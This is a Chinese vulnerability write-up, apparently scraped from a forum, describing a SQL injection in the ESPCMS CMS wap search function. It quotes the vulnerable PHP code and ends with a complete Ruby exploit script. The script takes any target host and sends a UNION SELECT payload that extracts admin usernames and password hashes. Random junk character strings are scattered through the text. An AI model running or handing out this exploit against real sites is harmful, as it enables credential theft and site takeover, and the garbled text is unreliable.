espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
0×2 PoC
4 Z, J; v, O( o% C. \6 d6 s

9 w+ |$ c  f- ~7 D) v' }
' W& F; Q2 e7 Q( p" b0×0 漏洞概述
$ x3 u9 y3 W" |- W3 t
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
9 R# s0 x" s; Z+ E7 ?; E其在处理传入的参数时考虑不严谨导致SQL注入发生

9 q0 B  X% C0 n4 q4 S$ I; X
% n& x/ E4 u5 [7 }0×1 漏洞细节
* O' n5 z1 R, d7 [7 w: ^
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
* d0 U# a" `) Q" v6 D正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。

3 W  ~$ p* }8 Y+ ^  S, ~  ~在/interface/3gwap_search.php文件的in_result函数中:
6 Y) ], I! J( |( V4 k: Y0 P
- P4 n' H2 t7 u- Z; ]5 O
' ~# f- ~- B5 I% A. P
% z: Z1 R8 C4 [; ]       function in_result() {
; Z0 x" G/ s& D6 `' y9 R3 H4 F            ... ... ... ... ... ... ... ... ...
, O& V& z- D2 N1 Y3 S            $urlcode = $_SERVER[ 'QUERY_STRING '];
* v8 `* ]" C2 y# u  Q  K( n            parse_str(html_entity_decode($urlcode), $output);

! _, g2 J( a, _- r            ... ... ... ... ... ... ... ... ...
0 k+ }& W1 V! B! u' I# c4 {' \            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

4 l* L: A; c, ^9 Q                  $db_table = db_prefix . 'model_att';

                   foreach ($output['attr' ] as $key => $value) {
                         if ($value) {

                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
0 S+ }5 W- V& i. P% p+ k  b                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
" e( J2 W1 s) d, y0 [- M* E                              $countnum = $this->db_numrows($db_table, $db_att_where);
                               if ($countnum > 0) {
                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
3 f: l8 N& h" Z8 o( g9 x                              }
                        }
9 D# j  w/ P0 ^+ ?% k                  }
4 U4 f' a9 o! v# l0 W9 w0 T% L5 E            }
. `. P; b/ Q9 Z9 @            if (!empty ($keyword) && empty($keyname)) {
( R( a" p% r# ]- [5 W                  $keyname = 'title';
                  $db_where.= " AND a.title like '%$keyword%'" ;
            } elseif (!empty ($keyword) && !empty($keyname)) {
( {, o, ^8 c" r1 h' a; @+ i/ \4 G                  $db_where.= " AND $keyname like '% $keyword%'";
            }
* P4 R, ?8 r2 W9 e8 O0 u            $pagemax = 15;
7 ~% z9 b" V$ @# J
  J5 G4 t6 y* C2 A            $pagesylte = 1;
) D& L5 ]; h& x' m
8 v4 s3 Y5 O, [2 r7 L             if ($countnum > 0) {

                  $numpage = ceil($countnum / $pagemax);
            } else {
                  $numpage = 1;
            }
: A* D1 F8 O8 i; H1 k7 o            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
2 H4 u8 \4 v- e1 W! R& I, |            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
            ... ... ... ... ... ... ... ... ...
6 {" S  x9 a. L  K3 s: v% L9 ^      }


0×2 PoC
/ `' g- ^. o' L

- V$ M( M) ^0 }# e0 f
require "net/http"
, S" v. ~- _+ L
def request(method, url)
    if method.eql?("get")
- ?! K7 Y0 H0 e) e% M& r        uri = URI.parse(url)
2 c8 u9 j) t9 u$ s; U' N. ?* f  `        http = Net::HTTP.new(uri.host, uri.port)
$ X4 G. H+ Y: g        response = http.request(Net::HTTP::Get.new(uri.request_uri))
. i) t( y( i' |3 J( M2 u8 }        return response
    end
end
' z. z- q% U: e( {2 |! f' o
doc =<<HERE
8 Y5 A5 m' Z: ?. {- h, ?# O-------------------------------------------------------
, x( u7 x0 v# Q3 \* D8 EEspcms Injection Exploit
& x; C% s& P3 r; Y. zAuthor:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------

HERE

usage =<<HERE
: x5 |$ T- {' p9 R6 w% `. X7 P4 aUsage:         ruby #{$0} host port path
/ m6 j/ ^  S9 u; W( |9 x# [% k5 texample:     ruby #{$0} www.target.com 80 /
$ H) y. M. w3 k% z5 t/ {8 _4 gHERE

puts doc
if ARGV.length < 3
    puts usage
. S" ?% m0 c: C$ I; zelse
; E0 {* j' [0 [5 s    $host = ARGV[0]
9 h# ]1 u: b9 H! {7 w. w    $port = ARGV[1]
& X7 [  ?$ K0 {+ [$ t    $path = ARGV[2]

4 h$ @. c7 c* g: u) K# s    puts "

send request..."
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
% c, n* k/ ?8 T' R3 G6 L,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
* w5 z1 \7 R6 W1 R- R/ m# F    response = request("get", url)
    result = response.body.scan(/\w+&\w{32}/)
1 e% ^" e3 U0 B5 X6 _1 S    puts result
6 N5 I* z  q. N3 F$ d$ jend